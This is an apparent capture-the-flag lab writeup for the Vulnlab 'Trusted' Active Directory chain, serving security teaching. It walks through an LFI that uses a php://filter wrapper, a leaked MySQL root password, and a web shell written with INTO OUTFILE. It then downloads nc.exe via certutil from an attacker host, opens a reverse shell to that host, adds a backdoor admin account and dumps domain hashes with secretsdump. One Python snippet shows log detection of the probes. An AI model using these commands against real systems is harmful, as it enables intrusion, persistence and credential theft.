Vulnlab: Trusted

— Brief —

Trusted is a chain consisting of 2 machines: an Active Directory environment with 2 domains, a child domain and a parent domain.

This vulnerable lab environment expects us to gain access to a user inside the Enterprise Admins group of Active Directory Domain Services.

Scope:

  • 10.10.210.181
  • 10.10.210.182

— Enumeration Phase —

First of all, we start from a point where we only have the IPv4 addresses. So we begin with port scanning, covering the 1000 most commonly used TCP ports.

┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $sudo nmap -Pn -n -sS -sV -sC 10.10.210.181-182 -oN default_scan.nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 20:10 UTC
Nmap scan report for 10.10.210.181
Host is up (0.060s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-03 20:10:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T20:10:41+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2024-09-02T20:00:47
|_Not valid after:  2025-03-04T20:00:47
| rdp-ntlm-info: 
|   Target_Name: TRUSTED
|   NetBIOS_Domain_Name: TRUSTED
|   NetBIOS_Computer_Name: TRUSTEDDC
|   DNS_Domain_Name: trusted.vl
|   DNS_Computer_Name: trusteddc.trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-09-03T20:10:25+00:00
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-09-03T20:10:27
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s

Nmap scan report for 10.10.210.182
Host is up (0.060s latency).
Not shown: 985 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.210.182/dashboard/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-03 20:10:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp  open  ssl/http      Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.210.182/dashboard/
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL 5.5.5-10.4.24-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.4.24-MariaDB
|   Thread ID: 10
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, FoundRows, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, IgnoreSigpipes, ConnectWithDatabase, SupportsTransactions, LongColumnFlag, SupportsCompression, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsLoadDataLocal, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: 6?yfq&gTOpf/T;j'{]>[
|_  Auth Plugin Name: mysql_native_password
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T20:10:41+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LAB
|   NetBIOS_Domain_Name: LAB
|   NetBIOS_Computer_Name: LABDC
|   DNS_Domain_Name: lab.trusted.vl
|   DNS_Computer_Name: labdc.lab.trusted.vl
|   DNS_Tree_Name: trusted.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-09-03T20:10:25+00:00
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2024-09-02T20:00:51
|_Not valid after:  2025-03-04T20:00:51
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2024-09-03T20:10:30
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Post-scan script results:
| clock-skew: 
|   -1s: 
|     10.10.210.181
|_    10.10.210.182
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 35.98 seconds

According to Nmap Scan:

10.10.210.181

  • Domain Controller (88/TCP is the default Kerberos port.)
  • Remote Desktop Protocol (3389/TCP is the default RDP port.)
  • Domain Name: trusted.vl0 (From the RDP service, via Nmap script scanning)
  • Domain Controller FQDN: trusteddc.trusted.vl (From the RDP service, via Nmap script scanning)
  • Windows Operating System (From several services’ version outputs)
  • SMB signing is enabled and required. (No need to check for relay attacks.)

10.10.210.182

  • Domain Controller (88/TCP is the default Kerberos port.)
  • Remote Desktop Protocol (3389/TCP is the default RDP port.)
  • Domain Name: lab.trusted.vl (From the RDP service, via Nmap script scanning)
  • Domain Controller FQDN: labdc.lab.trusted.vl (From the RDP service, via Nmap script scanning)
  • Windows Operating System (From several services’ version outputs)
  • SMB signing is enabled and required. (No need to check for relay attacks.)
  • Web Server (80/TCP or 443/TCP is a sign of a web application; packaged with XAMPP.)
  • MySQL Server (3306/TCP is the default port for MySQL or MariaDB services.)

Tip: XAMPP is a software bundle that includes Apache, MariaDB, FileZilla and some other components. It is mostly found on Windows hosts that serve PHP web applications.

As security professionals, we should always prioritize our attack surfaces. Our paid time is limited, so we need to give our clients our best effort by covering the most promising attack vectors first.

From this port scanning output, I prioritize the attack surface in this order:

  • Web Servers (80/TCP, 443/TCP)
  • SMB Public Shares, Null Sessions.
  • Kerberoastable Users.
  • LDAP anonymous binding.
  • Brute-force attacks. (SMB, MySQL. RDP brute-force is not recommended, because it may lock user accounts.)
  • And plenty of other attack techniques.

I will start with the web servers on the host whose address ends with 182. The web server is up-to-date and supports PHP. (This comes from the Nmap script output; you can also verify it by checking the HTTP headers.)

  • Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6

— Enumeration on Web Server —

When we try to access the web server via its root URL, we are redirected to the /dashboard/ folder. That folder holds the default installation page of XAMPP.

http://10.10.210.182/ -> http://10.10.210.182/dashboard/

Tip: XAMPP’s default web application includes a phpinfo page and the phpMyAdmin application.

Tip: phpMyAdmin is a web application written in PHP. It is a database management tool.

From the phpinfo page, we can enumerate sensitive information.

http://10.10.210.182/dashboard/phpinfo.php
---
OS Build: Windows NT LABDC 10.0 build 20348 (Windows Server 2022) AMD64 
OS Model and Version: Microsoft Windows Server 2019 Datacenter [10.0.17763] 
MySQL Installation Directory: \xampp\mysql\bin 
Webroot Path: C:/xampp/htdocs 

phpMyAdmin returns a 403 page; the directory is forbidden.

There is not much else to do in this dashboard directory.

It’s time to check what other directories exist under the webroot path. Hidden directories or files that are not linked from the main page might expand our attack surface. We try a brute-force attack to discover directories and files on the web server.

┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $ffuf -u http://10.10.210.182/FUZZ -w ~/Desktop/tools/raft-large-dir.txt -mc all -fc 404,403

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.210.182/FUZZ
 :: Wordlist         : FUZZ: /home/user/Desktop/tools/raft-large-dir.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404,403
________________________________________________

img                     [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 53ms]
dev                     [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 52ms]
dashboard               [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 60ms]
IMG                     [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 55ms]
examples                [Status: 503, Size: 402, Words: 34, Lines: 12, Duration: 2061ms]
Img                     [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 52ms]
DEV                     [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 52ms]
Dev                     [Status: 301, Size: 336, Words: 22, Lines: 10, Duration: 53ms]
xampp                   [Status: 301, Size: 338, Words: 22, Lines: 10, Duration: 52ms]
                        [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 64ms]
Dashboard               [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 53ms]
Webalizer               [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 79ms]
WEBALIZER               [Status: 301, Size: 342, Words: 22, Lines: 10, Duration: 54ms]
                        [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 60ms]
                        [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 58ms]
:: Progress: [62284/62284] :: Job [1/1] :: 701 req/sec :: Duration: [0:01:36] :: Errors: 2 ::

According to the directory fuzzing output:

  • There are 6 directories.
    • /dev/ -> A custom directory on the web server.
    • /xampp/, /webalizer/, /img/, /dashboard/, /examples/ -> Default directories of an Apache server shipped with XAMPP.

Tip: The Windows filesystem is case insensitive. So “/Dashboard” and “/dashboard” represent the same directory.

As security professionals, we should check the /dev/ directory.

Tip: Subdomains, directories or other digital assets named dev, development, beta or staging are mostly not hardened. So they might contain juicy attack vectors for threat actors.

So, it’s a web application for a law firm. We need to expand our attack surface further, so we will check the other web pages linked from the main page’s header menu. 🙂

Once we click the “ABOUT” link, we are redirected to this URL:

http://10.10.210.182/dev/index.html?view=about.html

That is a very interesting URL, because it refers to an HTML file but takes input, and that input holds a filename.

Sooo, let’s get back to IT basics.

  • HTML is a markup language.
  • It’s not executed on Server-Side. (Web-servers such as Apache, IIS)
  • It’s rendered on Client-Side. (Web-browsers such as Chrome, Firefox)
  • Mostly, static HTML files are sent as-is to clients by web servers.

For those reasons, there is no need to use query strings on HTML files. (But there might be JavaScript code in HTML files that uses query parameters within the URL.)

The easiest way to explain this URL is through the web-server configuration.

On vanilla PHP web applications, we might see .html extensions executed server-side by the web server’s PHP module. So for the URL above, there might be a .htaccess file that tells Apache to hand the html extension to its PHP module.

Tip: PHP web applications served by Apache might store .htaccess files in a directory to configure the web server. These .htaccess files direct Apache’s execution policy.

Our theory: this interesting URL shows us that HTML file extensions are executed by Apache’s PHP module.

Let’s check our theory. How? “.htaccess” files are mostly used to configure Apache and are mostly found in the webroot path.

Besides this explanation, you can easily read “.htaccess” files with a Path Traversal or Local File Inclusion vulnerability. Let’s check whether the view parameter is used in an include/require function or in any file-read function.

http://10.10.210.182/dev/index.html?view=0x5001

It seems the “view” parameter is used in an include function. This is a critical phase to understand: the PHP error message is too detailed.

— Web Application Exploitation —

It’s a Local File Inclusion (LFI) vulnerability, because the “include” function executes any PHP code contained in the included file.

Tip: PHP code starts with “<?php” or “<?=” tags.

Also, our input is not concatenated with a prefix directory. This allows us to use PHP wrappers, which expand our attack surface, for example by reading a PHP file’s source.

Tip: PHP wrappers are URL-style protocols for use with the filesystem functions.

Let’s get back to our theory: we need to read the “.htaccess” file to verify it.

http://10.10.210.182/dev/index.html?view=.htaccess

“AddType application/x-httpd-php .htm .html”

This directive is why html extensions are executed by Apache’s PHP module.

Let’s focus on reading other files. But which files? Which files can expand our attack surface further?

  • Included files in index.php
  • Sensitive files inside of webroot path.
  • Custom web applications to find vulnerabilities from white-box perspective.
  • Other applications’ configuration files.
  • UNC paths to reveal an NTLMv2 hash. (Because it is a Windows OS, we could try.)

Tip: index.php is served as the main page by the web server when we access a <directory>/ endpoint. (By default Apache tries “index.php” first and “index.html” second.)

Firstly, we can read “index.html” to find other included PHP files.

We cannot read the contents of index.html with this URL:

http://10.10.210.182/dev/index.html?view=index.html

Why? Because the “include” function used in index.html executes the PHP tags, so we cannot read the PHP code inside index.html; it is executed when included. Instead, we can use the PHP filter wrapper to Base64-encode the content of index.html.

PHP wrapper that Base64-encodes a file’s content:

php://filter/convert.base64-encode/resource=<filename>

The backend code would then effectively be:

include("php://filter/convert.base64-encode/resource=index.html");

So our URL will be this:

http://10.10.210.182/dev/index.html?view=php://filter/convert.base64-encode/resource=index.html

Why did we not try Remote File Inclusion? Nice question. On modern PHP configurations, loading external files in include/require functions is disabled by default.

We can check this configuration on the phpinfo page we found earlier.

allow_url_include = Off
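As an added defender-side example (not the lab’s or the author’s code), the following Python reproduces the allowlist the /dev/ include should have enforced and runs it over a few constructed Apache access-log lines, so the probes used in this section (“0x5001”, “.htaccess”, the php://filter wrapper) surface as findings. The allowlist, the log lines and the names `classify_view`/`scan_log` are assumptions made for illustration.

```python
"""Allowlist and log-review logic for the /dev/ ``?view=`` include.

Added example, not the lab's own code. The allowlist, the sample log
lines and the function names are assumptions made for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common/combined access-log prefix (constructed sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The only pages the /dev/ index should ever include.
ALLOWED_VIEWS = {"index.html", "about.html", "contact.html"}

# Matches "php:", "data:", "expect:", "file:" ... but not a bare drive "C:".
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.IGNORECASE)


def classify_view(value):
    """Return None for an allowlisted page, otherwise why the value is rejected.

    The checks mirror what a fixed include should refuse: stream wrappers
    (the php://filter trick above), directory traversal, absolute or UNC
    paths, dotfiles such as .htaccess, and anything not on the allowlist.
    A second percent-decode catches double-encoded probes.
    """
    v = unquote(value)
    if WRAPPER_RE.match(v):
        return "stream wrapper"
    if ".." in v.replace("\\", "/").split("/"):
        return "path traversal"
    if v.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", v):
        return "absolute path"
    if v.startswith("."):
        return "dotfile"
    # Windows serves names case-insensitively, so compare case-insensitively.
    if v.lower() not in ALLOWED_VIEWS:
        return "not allowlisted"
    return None


def scan_log(lines):
    """Return (client_ip, decoded_view, reason) for every rejected ?view= request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qs splits on the first '=' only, so 'resource=db.php' survives.
        for raw in parse_qs(query, keep_blank_values=True).get("view", []):
            reason = classify_view(raw)
            if reason:
                findings.append((m.group("ip"), unquote(raw), reason))
    return findings


# Constructed access-log lines modelled on the requests shown in this writeup.
SAMPLE_LOG = [
    '10.8.3.126 - - [03/Sep/2024:20:15:01 +0000] "GET /dev/index.html?view=about.html HTTP/1.1" 200 1177',
    '10.8.3.126 - - [03/Sep/2024:20:16:12 +0000] "GET /dev/index.html?view=0x5001 HTTP/1.1" 200 412',
    '10.8.3.126 - - [03/Sep/2024:20:17:40 +0000] "GET /dev/index.html?view=.htaccess HTTP/1.1" 200 350',
    '10.8.3.126 - - [03/Sep/2024:20:18:05 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=db.php HTTP/1.1" 200 540',
    '10.8.3.126 - - [03/Sep/2024:20:19:30 +0000] "GET /dev/index.html?view=..%252F..%252Fxampp%252Fphp%252Fphp.ini HTTP/1.1" 200 9000',
    '10.8.3.126 - - [03/Sep/2024:20:20:00 +0000] "GET /dev/index.html?view=About.html HTTP/1.1" 200 1177',
    '10.8.3.126 - - [03/Sep/2024:20:21:00 +0000] "GET /dashboard/ HTTP/1.1" 200 7100',
]

if __name__ == "__main__":
    for ip, view, reason in scan_log(SAMPLE_LOG):
        print(f"{ip}  view={view!r:60}  {reason}")
```

Only the two allowlisted “about.html” requests and the /dashboard/ hit pass; the double-encoded traversal is caught because the decode is applied twice.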

So, let’s jump to LFI exploitation.

We have gained access to the index.php file content. We decode this base64-encoded content and redirect the output to a file named “index.php” on the attacker machine.

echo "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" | base64 -d > index.php

Once we analyze the index.php file, we see that no other files are included. So we should expand our attack surface with other files.

Tip: PHP files mostly include other files in their first lines, as the PHP interpreter reads code from top to bottom. So any configuration or function files must be included in the first lines to be available to the rest of the code.

So, our first attack vector (included files in index.php) did not expand our attack surface.

Let’s focus on the second attack vector, directory and file fuzzing. If we can find any other custom application we can access, we can obtain its code and find vulnerabilities in it.

We should scan for directories and files inside the “/dev/” directory, because this technique can reveal other files or directories. Since we can read file contents, we can easily find vulnerabilities in code or gain access to sensitive configuration such as database connection URIs.

┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $ffuf -u http://10.10.210.182/dev/FUZZ -w ~/Desktop/tools/raft-large-files.txt -mc all -fc 404,403

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.210.182/dev/FUZZ
 :: Wordlist         : FUZZ: /home/user/Desktop/tools/raft-large-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: all
 :: Filter           : Response status: 404,403
________________________________________________

index.html              [Status: 200, Size: 2311, Words: 132, Lines: 80, Duration: 65ms]
contact.html            [Status: 200, Size: 1967, Words: 84, Lines: 75, Duration: 58ms]
.                       [Status: 200, Size: 2311, Words: 132, Lines: 80, Duration: 58ms]
about.html              [Status: 200, Size: 1177, Words: 56, Lines: 41, Duration: 56ms]
db.php                  [Status: 200, Size: 22, Words: 2, Lines: 1, Duration: 72ms]
Contact.html            [Status: 200, Size: 1967, Words: 84, Lines: 75, Duration: 72ms]
Index.html              [Status: 200, Size: 2311, Words: 132, Lines: 80, Duration: 58ms]
About.html              [Status: 200, Size: 1177, Words: 56, Lines: 41, Duration: 54ms]
DB.php                  [Status: 200, Size: 22, Words: 2, Lines: 1, Duration: 55ms]
:: Progress: [37050/37050] :: Job [1/1] :: 735 req/sec :: Duration: [0:00:54] :: Errors: 0 ::

From the file fuzzing output, we found a PHP file named “db.php”.

Tip: db.php, config.php and configuration.php files might be located in an “include” or “inc” directory, and they always store sensitive, juicy configuration fields.

Let’s read the file’s content.

http://10.10.210.182/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php

┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $echo 'PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=' | base64 -d
<?php 
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";

We have got a database connection credential. It’s a MySQL/MariaDB server credential.

Credentials:
Username: root
Password: SuperSecureMySQLPassw0rd1337.
Servername: localhost
Database: ?

Hmm, we have got a database credential. What should we do? If you remember, we have an open port for the MySQL service.

Tip: MariaDB is a free fork of MySQL software.

— Database Connection —

Because we have a credential, we can use it to connect to services that require authentication, such as MySQL, SMB and RDP.

Let’s start with MySQL service:

Tip: “root” is the default privileged user on MySQL servers.

We are free to use the mysql client to connect to the MariaDB server.

┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted]
└──╼ $mysql -h'10.10.210.182' -u'root' -p'SuperSecureMySQLPassw0rd1337.'
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 20
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| news               |
| performance_schema |
| phpmyadmin         |
| test               |
+--------------------+
6 rows in set (0.081 sec)

Tip: Sometimes we cannot connect to a MySQL server from an external host; that happens when MySQL users are restricted to white-listed source IP addresses.

Now, it is time to think about what we should do on the MySQL server.

  • Read database contents to find more credentials
  • Check MySQL configuration to create new files on filesystem.
  • (We do not need to read files, because we already have read access to the filesystem via the Local File Inclusion vulnerability.)

I am going to try creating a new file on the server’s filesystem.
(Do not forget: the MySQL service and the Apache service are installed on the same server.)

So, what happens if I create a new file on the server? Think twice about what we have access to now: an Apache server and a MySQL server. Once we create a PHP file in Apache’s webroot path via SQL queries, we can execute this PHP file through the web server just by requesting it over HTTP.

If you want to make the process a bit trickier, you can create an HTML file containing PHP code, because the HTML extension is already executed by Apache’s PHP module.

Our theory is to get RCE from a PHP file in webroot path.

What we need to verify our theory:

  • Does the related MySQL configuration allow write access to the whole filesystem?
  • What is webroot path?

Firstly, we check MySQL configuration to find the path where we can create files.

This configuration variable is named “secure_file_priv”.

MariaDB [(none)]> SHOW VARIABLES LIKE "secure_file_priv"; 
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.073 sec)

The value is blank, which means we have write access to all paths within the filesystem.

Now we should create a file in the webroot path, which we saw on the phpinfo page.

We can use this query to write query output to the filesystem:

SELECT "Example String from 0x5001" INTO OUTFILE "<PATH>";

Now let’s chain all this knowledge into a single SQL query that creates a PHP file in the webroot path.

PHP file name: “0x5001.php”
Webroot path: “C:/xampp/htdocs”

MariaDB [(none)]> SELECT "<?=shell_exec($_GET[0])?>" INTO OUTFILE "C:/xampp/htdocs/0x5001.php";
Query OK, 1 row affected (0.061 sec)

We can access this URL to execute our newly-created PHP file.

I executed the “whoami” command to see whether our tiny PHP script works as expected.

http://10.10.194.166/0x5001.php?0=whoami

Wow, we have access as a highly privileged user. Because the web server runs as a highly privileged process, our PHP script is executed under that security context.

— Initial Access —

We can upload the nc.exe binary from our attacker machine to the server and get a reverse shell by executing nc.exe from the PHP script.

Tip: If there is an AV, we cannot use nc.exe because it will be flagged.

┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $find / -name nc.exe 2>/dev/null 
/usr/share/sqlninja/apps/nc.exe
/usr/share/windows-resources/binaries/nc.exe
┌─[✗]─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $cp /usr/share/windows-resources/binaries/nc.exe .
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

To transfer nc.exe to the target, I started a web server on my attacker machine with the nc.exe binary in its webroot.

10.10.194.166/0x5001.php?0=certutil.exe -f -urlcache http://10.8.3.126:8000/nc.exe nc.exe

We can use built-in Windows executables to download files from external resources.

It is time to execute nc.exe from the PHP script, and we finally get a reverse shell.

http://10.10.194.166/0x5001.php?0=nc.exe -e powershell 10.8.3.126 4444
┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $nc -lvnp 4444
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.194.166:56765.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\xampp\htdocs> whoami
whoami
nt authority\system
PS C:\xampp\htdocs> 

That’s awesome. We have got privileged access to

— Local User to Enterprise Admin User —

Let’s analyze a little what we have right now. We are on a Domain Controller with privileged access, so we can dump the “ntds.dit” file. But first, we should create a user for persistence.

PS C:\xampp\htdocs> net user 0x5001 Sup3rPass1 /add         
net user 0x5001 Sup3rPass1 /add
The command completed successfully.
PS C:\xampp\htdocs> net localgroup administrators 0x5001 /add
net localgroup administrators 0x5001 /add
The command completed successfully.

Now, we will be able to connect to the server via RDP service.

Because the Domain Controller is reachable from our attacker machine, we can use “impacket-secretsdump” to dump credentials from it remotely.

┌─[user@parrot]─[~/Desktop/vulnlab/chain/trusted/www]
└──╼ $impacket-secretsdump 0x5001:[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x68580865f85a4743db214876adf784df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
LAB\LABDC$:aes256-cts-hmac-sha1-96:66314ebc733a8e2c7ad1981df445e830b86708fa0f30b37d5fb5af648c74c7ed
LAB\LABDC$:aes128-cts-hmac-sha1-96:ad8d9d4948dc22086365ab383785a0b6
LAB\LABDC$:des-cbc-md5:a1ab5b5219d69b4a
LAB\LABDC$:plain_password_hex:a27486e5d31de3eeffc13e509350c523a21acb9ccac4de7011106ef09fc81b12eb00f83153ee08198aced938db8144dca607c2c18d931bf1f43845f8ed656cf792441632eefbfb88ba426bce8c6aaa43476d1f9423c741289d922d2b3e2417ebebc603ee87462a2c6b2d32af6f2b9028fef2aac110a9624b1e14dbc0cfee5efc30bd14fbf37fe894143dc9a50dddb96584323db23bbdfd8f4c1156e7e61d5e7aed1a5b75fefe609363db2984e149b7e3a29077c4d964d12519f9caabf4d95dea0a79bef3eac46cd5dd69ee4d53e66d9c2d7f30502e99fca53190e300efd2a9e14fbda318a399f74b11adadb84957cd0a
LAB\LABDC$:aad3b435b51404eeaad3b435b51404ee:2e1b1bcabeb4f62d6bbea5366543f4ff:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x34bbd503801a432eba3e789e4452f494b5b41342
dpapi_userkey:0xce5eac76a1bfb440011bc4b5d0c14e2b1f842e13
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
0x5001:2101:aad3b435b51404eeaad3b435b51404ee:eadbd189f745c308a95fbee09ecf63d3:::
